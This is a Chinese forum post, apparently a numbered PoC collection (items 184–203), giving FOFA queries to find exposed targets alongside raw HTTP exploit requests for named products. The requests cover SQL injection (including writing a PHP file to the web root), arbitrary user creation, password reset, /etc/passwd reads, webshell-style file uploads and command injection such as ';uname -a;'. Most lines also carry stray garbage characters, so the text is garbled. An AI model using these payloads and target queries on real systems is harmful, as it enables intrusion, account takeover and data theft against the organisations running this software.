; }8 E6 F+ Y4 R7 i' m+ B7 lAccept-Charset: utf-8) x( n" d, e/ }  I
Accept-Encoding: gzip, deflate, X- `1 m% D7 L* p8 i9 `: D
Connection: close
" c* a  E+ J2 {0 n/ c: w) n* s4 m8 L& U1 g" Q1 J$ X+ M
2 q- a+ b' q5 n( e0 G
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
+ H7 T8 f  b0 D* ]FOFA:server="SunFull-Webs": g3 \6 w# I5 s7 u- f5 r- V
POST /soap/AddUser HTTP/1.1" |7 _- ~2 X9 f/ [1 i$ x
Host: your-ip6 z, y7 l* L7 C/ ?
Accept-Encoding: gzip, deflate+ n* R* U2 e7 Q; u; n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0  c9 Z5 I5 T" l$ S" i! `
Accept: application/xml, text/xml, */*; q=0.01+ n! P% ]& [2 G1 ^  Y% M& _
Content-Type: text/xml; charset=utf-8
/ Y& E+ [+ ]+ z/ l2 N% SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 G( B3 U( Z9 \7 S! q, |- s; LX-Requested-With: XMLHttpRequest
: J6 ?( K# B2 B2 ~$ V. @! p
6 k* U. ~+ X, [$ O
. }- g( [  o# ], z5 d+ \insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')3 |9 V1 Y  `' W3 s, N- X
; I5 n6 Z) F& b6 c! a

: s& d/ Q* V! f6 B1 L- n185. 瑞友天翼应用虚拟化系统SQL注入& e. r& b3 d) r% v) K1 p
version < 7.0.5.1! ~% P' @! W6 Q* d+ J% X
FOFA:app="REALOR-天翼应用虚拟化系统"
! t$ w3 g- M0 e7 W& C: Q/ ~" c; NGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1, U1 }1 P8 `( T$ t
Host: host
+ z! Z$ j6 I; \) s+ {
. H+ J; }6 }4 j! X/ H
0 ]# ?& p. K6 G% q186. F-logic DataCube3 SQL注入& d- U) Q) y- }& K5 H$ |1 Y
CVE-2024-31750* h& ?- e& Y, g; T: R9 Q
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
# W% N. j$ Y' s5 `& m6 K! z' {) {" TFOFA:title=="DataCube3"
4 s4 i5 }8 a- ~- KPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
4 ^  S- d0 V. l, \) hHost: your-ip0 K5 {) u/ ^. E6 {) j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0! b5 S$ j; f+ I( _5 ]6 v$ C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
- ~4 F& P) Z1 T( r0 v! Q. GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 q/ E" t7 T* C# v
Accept-Encoding: gzip, deflate  O$ Y# y$ x( c: P
Connection: close' A) }% y  i/ `+ i" c
Content-Type: application/x-www-form-urlencoded
! W8 }! t1 t: Z- _  h/ e; o1 n+ v4 W/ w2 A+ z% i
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
! F* x& r# @4 Q& b# A, J& Y
+ n! \* t5 H) I$ ~; r; w/ R: I$ z# O) m* Q! ~
187. Mura CMS processAsyncObject SQL注入0 e. y( U" j6 U6 a: \, R
CVE-2024-326402 M+ y" x" j8 t& P  a6 ^5 s: V
FOFA:"Mura CMS"
8 [9 a  Q: q1 i$ _# F2 f6 q& bPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
, s, ^1 V- J9 @9 C0 M4 oHost: your-ip
5 n& d" {% E: a9 QContent-Type: application/x-www-form-urlencoded2 Y. C: H" e2 h& Z* w

2 k* B) R; U6 E: s4 U! R: T: E+ |2 Y8 C" m
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
6 _$ C# }! Q5 m6 m6 i2 z4 @9 C& @4 l6 |* Q5 M; |2 _6 z0 G

7 K/ R$ i7 i" P8 D; }" Y$ F$ c188. 叁体-佳会视频会议 attachment 任意文件读取
1 M0 ]4 B% h& k' G2 r% H$ m  Vversion <= 3.9.79 r( |- J; G! o3 A
FOFA:body="/system/get_rtc_user_defined_info?site_id"
5 E9 l7 g8 g9 }7 W. ZGET /attachment?file=/etc/passwd HTTP/1.19 c3 }7 M& K; H7 G+ M) E
Host: your-ip0 p9 \, _$ s6 ^& P  V( u% T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* B5 c( z' ~/ d4 T6 g, a6 |- l. F2 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ T" v- p2 R$ L, `) k& X$ g/ k: B1 gAccept-Encoding: gzip, deflate
0 p0 `% r# a6 j" w% _1 }, x- FAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
' W9 Q0 Q2 e6 H: sConnection: close
! b, ^5 B6 W4 v. X) b
2 I# M5 Q& I) [% k8 z4 T4 v: b4 Y; o$ _
189. 蓝网科技临床浏览系统 deleteStudy SQL注入1 v5 u4 D$ ~) P+ H# P
FOFA:app="LANWON-临床浏览系统"
. y, l  H4 b; H' B- nGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1/ u) Z: d! t# E5 E" g
Host: your-ip
: f) A- R. [# U3 y) H1 N! S  VUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.369 I' A1 ]) D- L: G" L; I9 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 R, e# R" h$ E" ]0 l
Accept-Encoding: gzip, deflate/ d4 z) g3 c: k# e- U
Accept-Language: zh-CN,zh;q=0.9; k# [( v6 [( Q( S) F% [+ a) c5 q
Connection: close4 s! U% F* k7 s: I" V
+ ^& c6 ]! `1 B. A

2 ?) ?/ D; ^* y9 }190. 短视频矩阵营销系统 poihuoqu 任意文件读取
% k) \9 g* S0 y7 e0 _FOFA:title=="短视频矩阵营销系统"
, {0 K- O+ H8 m! C& ePOST /index.php/admin/Userinfo/poihuoqu HTTP/2* G1 Q6 q  u, O6 l- ^
Host: your-ip; [/ ^8 Z% a+ C1 J) f! A" q# _6 x- g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
; X7 C$ f; X) M' z4 P4 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9$ {" P: u2 z* ~9 \+ U( e# W
Content-Type: application/x-www-form-urlencoded
3 l7 P0 J$ }4 J1 T% F# a+ r* MAccept-Encoding: gzip, deflate
8 d. S; Z4 |9 L. u# A3 ~% mAccept-Language: zh-CN,zh;q=0.9
+ A- Z& X% M3 ]- b' c1 l) t2 ?; g2 d4 b
poi=file:///etc/passwd
- f7 h, Q( g0 y- _+ Y0 S  l% e* H" M- \+ R

- [: K: ]& F6 Q# O/ v6 z3 M191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入  a# k3 R% {$ z; G6 p
FOFA:body="/CDGServer3/index.jsp": F7 d5 x& v$ H* i; K
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
0 _: [8 p1 s* D% g. E# m9 `Host: your-ip7 [4 z6 c  n8 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 j- l! ~' Y" O- n6 _* T- A5 nContent-Type: application/x-www-form-urlencoded. O* f! Z! f$ P( z
1 F4 c& C, Y8 ]- [" c
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
& C- i6 q" w  ^4 w  a7 P5 d
- \2 E2 z/ z" k( o1 k" i0 }
8 N4 E; e8 U( b$ V) z  U# f0 t192. 富通天下外贸ERP UploadEmailAttr 任意文件上传1 e6 s3 K2 c6 t% z  a
FOFA:title="用户登录_富通天下外贸ERP"
6 z: s1 ?6 L5 m% HPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
  a: z$ p( v5 T( I5 fHost: your-ip( C& A) l+ X# Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# n, ]$ v; k- O, S5 }+ D' V
Content-Type: application/x-www-form-urlencoded# r+ M) B: H" u! H- S# v
$ v* x& f! l5 w( {9 j+ F, F6 p; F
7 f6 M+ q. ~( j+ g
<% @ webhandler language="C#" class="AverageHandler" %>1 g4 Z- u- Q1 B/ B, D& B
using System;
8 I) y+ M5 z3 Q) ?6 X  E& uusing System.Web;
0 @8 h/ d& H$ `" n* q5 _' }, z4 Bpublic class AverageHandler : IHttpHandler# B9 z2 K& S: F+ j5 g, n8 L) t
{
! R5 u, K& w3 b+ Ppublic bool IsReusable, i& U1 ]; O* Y8 {
{ get { return true; } }9 e0 Y; ^. L& j# g, @
public void ProcessRequest(HttpContext ctx)8 H, }* d( T2 g6 U
{6 n) y7 B1 a# N/ b, ~% T
ctx.Response.Write("test");* s0 R% n5 z( x0 Q( M0 {) X0 X! ?$ P- N
}0 B8 e) P3 x/ M9 ~2 q+ V4 }
}9 Z- b$ z$ Q5 L" u7 J

# X! T; Y/ j+ H2 u
5 m4 W9 u/ Y+ a& U8 T+ V, o193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
2 s2 q" S% M* L) Z$ ^# R6 X' nFOFA:body="山石云鉴主机安全管理系统"2 j; ?% t0 }6 j% E) R8 {
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
3 b& k* i/ V" H" Q2 IHost:
& y$ X$ `$ Y6 hCookie: PHPSESSID=2333333333333;* z0 K' ~' B3 O6 ]( v8 {* B
Content-Type: application/x-www-form-urlencoded9 t$ y+ J" u, V6 m$ u
User-Agent: Mozilla/5.0
2 L( T& d1 ^7 k. K8 s1 w4 {' d4 f8 y
, C( X5 f! w  n4 [. D4 D1 A& y8 \
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
8 @+ @4 a* D8 R) pHost:/ m" S! A% x! B
User-Agent: Mozilla/5.0, q0 ^) A- p% v$ y! V0 {2 d
Accept-Encoding: gzip, deflate; b) W$ X+ D+ U4 G/ U+ w' t
Accept: */*4 a) g% o1 ?) v; e
Connection: close
" C. G2 Y& r' }$ L% F3 f$ rCookie: PHPSESSID=2333333333333;
8 K0 }1 Q4 f- f/ @6 M* ]& X! uContent-Type: application/x-www-form-urlencoded4 ~& P  O. V3 h5 Z3 Y* \
Content-Length: 84
& K) K6 [" S$ ^' g% Q
+ Q1 r6 O' O8 ]' V; w1 r* j2 m9 M* sparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config'); l" O1 K9 W. ]& d( N1 m! ?
: O1 x9 H; d) v$ N' }5 `  X
. q: a3 {/ ~8 u
GET /master/img/config HTTP/1.1
3 w% q- f3 R. x/ l: kHost:7 ]+ C3 w3 n5 G* a
User-Agent: Mozilla/5.0, _( f- u( i8 z5 F
& c: h: q# e$ {" P7 X
4 X8 j' q, ?3 Q) w# |& g0 f7 h
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传$ {3 u4 F0 E) y, L
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
' H2 h. E& [: @  V' a. ~$ j; [- }# X6 ^, ~. F
POST /servlet/uploadAttachmentServlet HTTP/1.1
) g0 G8 _) p$ D: [) H1 oHost: host
! ]3 S$ @1 v, Y9 Z) t% `  ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36% e# I4 U; I* v5 X6 X6 `, B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 @: a1 p# Y6 _+ e7 _' R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" Z  ^- R8 _/ q2 ^$ y7 y3 ]  m' @5 w
Accept-Encoding: gzip, deflate6 ], s8 i0 u. y" \" z7 y1 w" z0 V+ j
Connection: close1 L$ M+ A# |, |$ O7 L: Q$ k" m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
8 l) v, Y. U& ?" ~3 X1 {5 _: O------WebKitFormBoundaryKNt0t4vBe8cX9rZk+ }5 e! s) E4 T8 ]/ c
( H3 }5 y, l: \+ ?- E' Q9 I+ J
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
' z3 w: B1 X) B$ lContent-Type: text/plain
! C% }8 j  ?. u- A6 I<% out.println("hello");%>& i$ Z; i. F! U" k6 v" k
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 q1 e+ y! }$ gContent-Disposition: form-data; name="json"
( _1 D# m8 a) L* f& } {"iq":{"query":{"UpdateType":"mail"}}}
# [: [: ~3 K. G. v1 x# {------WebKitFormBoundaryKNt0t4vBe8cX9rZk--$ t* z* s3 ]9 g9 W6 k$ ^3 M

" j5 M7 o0 z6 y4 F3 [- O; d; I9 J) H  q6 M
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
4 L( {& C( d- u7 UFOFA:title=="飞鱼星企业级智能上网行为管理系统
$ l) W& x1 [6 U) U7 TPOST /send_order.cgi?parameter=operation HTTP/1.1/ L/ a# B. e: k1 T, u0 u; e
Host: 127.0.0.14 P: v6 Q& K/ O+ A
Pragma: no-cache' S. q5 m* Q1 O! ?; u+ e2 ^2 L" k" ?
Cache-Control: no-cache4 K/ T( n: r) s  s( a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 r8 K3 k; [- j( _2 F2 V+ }1 I6 V# jAccept: */*
2 D- b0 @8 u( g# w" \3 f" bAccept-Encoding: gzip, deflate
. {' |5 R1 c/ Q; C2 `2 p' RAccept-Language: zh-CN,zh;q=0.97 m* a8 K3 J1 @! N  D* J- c  {
Connection: close+ _% l, g. ]. s" I; @0 s8 k4 i
Content-Type: application/x-www-form-urlencoded% _+ a$ C9 J% U9 w6 d+ q- }. V/ d
Content-Length: 68/ Y# ~4 l+ Z: H5 }3 J
! M' T% |1 ~$ c7 p. a
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}8 f; V0 E8 j" W: G; F
: `- I" b) c. U. G) y4 s/ g( Y# c
2 @. e; Z& W% o0 E
196. 河南省风速科技统一认证平台密码重置  j$ e( z2 U2 o5 z- J* p
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
% w" _. y" n2 U6 m) [POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
2 z9 C8 p3 d! b; V) ?4 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36' R  g+ C  C' n7 J
Content-Type: application/json;charset=UTF-8% N  Q1 v$ S1 g  u" m( \' V
X-Requested-With: XMLHttpRequest/ W, M8 ?2 W! n
Host:
& H2 p+ H* |5 f6 L* j; x2 aAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.28 ?% x  z9 m" o! F
Content-Length: 45: |9 ~$ x( H/ f0 O' \9 j+ p
Connection: close( u5 o. ?0 d( O- d" x4 J

" C, V+ F. ^$ c9 d+ U& r+ I{"xgh":"test","newPass":"test666","email":""}
* P# M; Z( u5 M' ~0 x* O; {
5 K7 h: }3 g; B4 h+ _0 a' N# C0 ?1 a4 f! \

; J5 D, j9 F0 E# k' _8 V197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
; ?1 @# X* V. L( [FOFA:app="浙大恩特客户资源管理系统"
; x5 F' M; |3 GGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1' t; U" s+ o& d& `: s' m  r! V. ~
Host:
9 V. ~' M% M0 |& q2 M6 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.366 ?4 _$ o$ _+ I+ [2 ~% P
Accept-Encoding: gzip, deflate' d) ^0 m6 K! w7 {
Connection: close
* u! u7 S+ D$ ]3 [; T! X( e0 j1 `: i( N, I8 b

7 _6 a- {8 a/ ~; v
, R8 p8 b  D) r* h198.  阿里云盘 WebDAV 命令注入
6 v) X) y; v+ ?6 h& |# `! y  hCVE-2024-29640
+ w1 ^. e9 ?) hGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1% Q+ i. u7 K6 B. h# f  }
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
0 N; w4 J2 E0 ^/ A5 o8 \Accept: */*
, r% O0 ?/ x9 e8 }1 H9 W, b: L' rAccept-Encoding: gzip, deflate
$ P: d% R2 ?+ _0 Y; HAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
4 a+ o7 [" ~0 {' J( |Connection: close7 X2 o: N1 {, \$ D1 ?* q; w
$ R6 f: t3 F  [% m& @- w: j

; m. s' z3 C; u/ z199. cockpit系统assetsmanager_upload接口 文件上传
7 t5 O8 o+ s3 O
  D' X: y) m1 ?% t1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
! u/ b$ ^! R' Q+ m+ xGET /auth/login?to=/ HTTP/1.1
- S# ^- g  o* ~4 f* V
9 B! l- y* d. q% Y' Q  Q+ \* _- f响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
/ J+ o. [* s- Z9 @& s% a6 Y% }* d0 Y8 A# O' Z  u
2.使用刚才上一步获取到的jwt获取cookie:
' H1 ]( f" Z4 {; T4 \8 l
& q+ i6 \' @) H( gPOST /auth/check HTTP/1.1
" F; |% ?( G; b! B3 Y  rContent-Type: application/json! ^( P7 H6 [9 Z- U
9 X1 h3 @6 \& d
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
; i* ?- q7 F2 }3 O, ^8 L' f7 C. |0 A
响应:200,返回值:5 ^  c5 d( n: c5 d& l
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
9 L' w0 O  Q5 ~( p4 P8 K4 oFofa:title="Authenticate Please!"$ V' _9 O. Z8 U8 f
POST /assetsmanager/upload HTTP/1.1' a" d+ J2 |: B0 [  P
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3) k- U# y8 f8 |
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
! L" c$ M1 X" b. y- P$ Y+ u. i/ M% o  I. u' E) @
-----------------------------36D28FBc36bd6feE7Fb3
! @  ]+ G9 ?, L4 y: t2 TContent-Disposition: form-data; name="files[]"; filename="tttt.php"
8 r$ e, P9 v" x) {/ J6 Q; y1 H$ qContent-Type: text/php  E& l0 D$ Y6 M. u: O9 X$ p' v

6 I1 T4 @2 O0 g5 O; y. j& v<?php echo "tttt";unlink(__FILE__);?>
; v; u6 o! _  G9 T8 q% v6 v-----------------------------36D28FBc36bd6feE7Fb37 h+ k* S8 E1 _( t/ N& w
Content-Disposition: form-data; name="folder"
0 t! ^, h, ^( d2 p% S
& T& @" t0 z# c( O; X+ Z7 Q-----------------------------36D28FBc36bd6feE7Fb3--
0 G( c3 u' ?7 m# i& q0 s- |$ b8 U, ]" A( Z" A  _/ ]  Z6 B" |

1 Z4 U! r5 j% y( g/storage/uploads/tttt.php
0 W7 I; J+ {/ ?$ ?/ X. U
. n* }  h8 U) z3 Q  l3 W! y5 b8 T) O200. SeaCMS海洋影视管理系统dmku SQL注入7 J; k! g  h6 ]7 |' T. S
FOFA:app="海洋CMS"
9 ?- c( {5 q& m* Y& _GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1  @# Q9 ]+ g  w# E
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
1 q  |. _8 c$ a7 }8 iUpgrade-Insecure-Requests: 1
6 t: t4 `1 h/ I3 I! JCache-Control: max-age=0; ^$ \6 F1 B2 S! O( B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ F& G: Q2 x0 l- N- i4 e
Accept-Encoding: gzip, deflate
$ s3 s9 a" t# W  r- M/ ^, l* \Accept-Language: zh-CN,zh;q=0.9
; l+ H1 ~  ]* a- I6 z2 {3 k: X1 N$ w6 G

4 m( z( {' c% C# C9 q/ u# z201. 方正全媒体新闻采编系统 binary SQL注入0 T) x# a& r# O
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
% t+ q& I' t  S" ?POST /newsedit/newsplan/task/binary.do HTTP/1.1- X5 q* V! Q2 V8 B$ W1 k
Content-Type: application/x-www-form-urlencoded" @, H( J8 {& a: p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( G0 o8 Q& p9 FAccept-Encoding: gzip, deflate" n$ L4 y. ?5 _; n) H/ ]/ a: c( C
Accept-Language: zh-CN,zh;q=0.93 ^3 ^, \/ s2 c# X
Connection: close
  a5 \0 D- Y1 O# T! U# {2 q9 P
6 T! g. m) \/ Q) Y. v/ ]; u! TTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
- z6 A/ G- _& @5 y/ L
6 A+ m% I4 e7 d' _0 Z3 O# q# @4 q7 m+ r. G! j  ?
202. 微擎系统 AccountEdit任意文件上传
  N0 e: J" J  K4 s) i4 gFOFA:body="/Widgets/WidgetCollection/"4 r' G8 h; Q7 T* j% g' F& [
获取__VIEWSTATE和__EVENTVALIDATION值) X9 L- L) k! c% ^, f
GET /User/AccountEdit.aspx HTTP/1.14 I  b; o* c9 j5 a, m: s, {8 [
Host: 滑板人之家+ z# \6 w. Q' {" E. ~! [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.310 U: A  D+ T* `" G6 t
Content-Length: 0
" c1 P7 L- r- ~* ~( e; k+ ^7 m
5 X0 h; n7 p& y* i: Q  N
# h! F) g9 a0 o* Z: h7 K替换__VIEWSTATE和__EVENTVALIDATION值
. d; R0 Q+ y& O, TPOST /User/AccountEdit.aspx HTTP/1.1
$ J5 o0 B- O% J1 k9 J5 O* ZAccept-Encoding: gzip, deflate, br
7 y0 L( J* p3 E4 bContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
0 c4 t) X6 X2 O. C6 Z0 p
/ c! ?8 F' c1 R: M6 C/ N, f; N-----------------------------786435874t38587593865736587346567358735687
+ M/ z2 i/ O0 fContent-Disposition: form-data; name="__VIEWSTATE"- W3 z6 G! W1 z( y8 W4 c" }

/ o; t+ h1 [' E! U% }8 Y0 g__VIEWSTATE6 `6 }( P/ R. k2 L
-----------------------------786435874t385875938657365873465673587356870 r8 q" g) K0 C
Content-Disposition: form-data; name="__EVENTVALIDATION", l* ~- w* ~; r4 T5 d' k
/ z5 o1 W3 U- a8 |3 B! u
__EVENTVALIDATION
2 K8 j1 M# }: c* G) J; Q8 @-----------------------------786435874t38587593865736587346567358735687$ m" z6 ^* h/ M" A3 @9 P0 j! ^
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
6 E  g% K9 r+ I$ ]# p( e' \Content-Type: text/plain
, U4 _: V( G9 p& R9 ?2 v% d+ B5 g& s) {- ]: F! ?
Hello World!( @7 C9 q+ y! P8 q
-----------------------------786435874t38587593865736587346567358735687
$ E, N  ^* v. K. XContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"" d6 D- l6 G3 ?9 E. B
4 U1 ?' }' e5 o# \& Y& i
上传图片
7 I) X4 b; s; j7 m/ O1 C( M-----------------------------786435874t38587593865736587346567358735687  m% {4 Z( j4 y$ o9 ^
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
: X! Q+ f3 [/ V( z9 S& p& d/ }5 t$ `6 S4 a! F

1 U% M( |2 \4 R% d9 s-----------------------------786435874t38587593865736587346567358735687
/ E  x! h/ N  [: V: D% _1 a% XContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
* L3 Y4 o# F/ P8 v" F5 R  r' {
0 s2 T5 W% ]# r7 U( Q2 B
7 h# T4 I5 E, r, G+ [2 i0 ?-----------------------------786435874t38587593865736587346567358735687--
8 B# H) o. G# M" x. G, N2 O7 Y* X: i) h6 H* d! ~2 |  K

, b& S+ n; w; |* l2 ^/_data/Uploads/1123.txt  N0 `1 a5 F0 l  X6 `

+ ]) v' M5 f. \8 o203. 红海云EHR PtFjk 文件上传0 t& s7 I1 S8 u  \* b
FOFA:body="RedseaPlatform"
5 `8 ]7 E5 x. \9 ?POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
( D" T, J! Z* o3 n! V/ D9 l$ s+ NHost: x.x.x.x+ W0 X. D2 [/ Z& m4 T- i
Accept-Encoding: gzip9 y  L6 Y6 U- k: ^9 C/ a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 v/ }! f& h7 Y3 k9 h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
' A0 d6 \- q' H! N+ _6 R' W; TContent-Length: 210
" I7 P) Z; r' r9 Q& I4 s; i2 N( ^7 X4 Y5 N
------WebKitFormBoundaryt7WbDl1tXogoZys4# [! q* r4 n5 f9 X8 q* M
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
) S2 e& Y4 z$ M+ |Content-Type:image/jpeg
' a% n. N; Q8 T3 M5 F' p$ @+ S
7 E- l$ e4 H% t, u' v( W& y( ]- m<% out.print("hello,eHR");%>
4 }" l. a9 P1 ]/ F2 \$ ~1 e------WebKitFormBoundaryt7WbDl1tXogoZys4--
( k% T8 d6 t) q4 `  I$ j
5 m# C8 i' ]9 |& X ! q/ R" F) {0 e4 u$ E
/ Y! Q6 m( h) q; y9 h
) |; ?( i7 ~# G! G

8 W: Q/ Q4 R( M) ~; H5 g+ D% X" f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表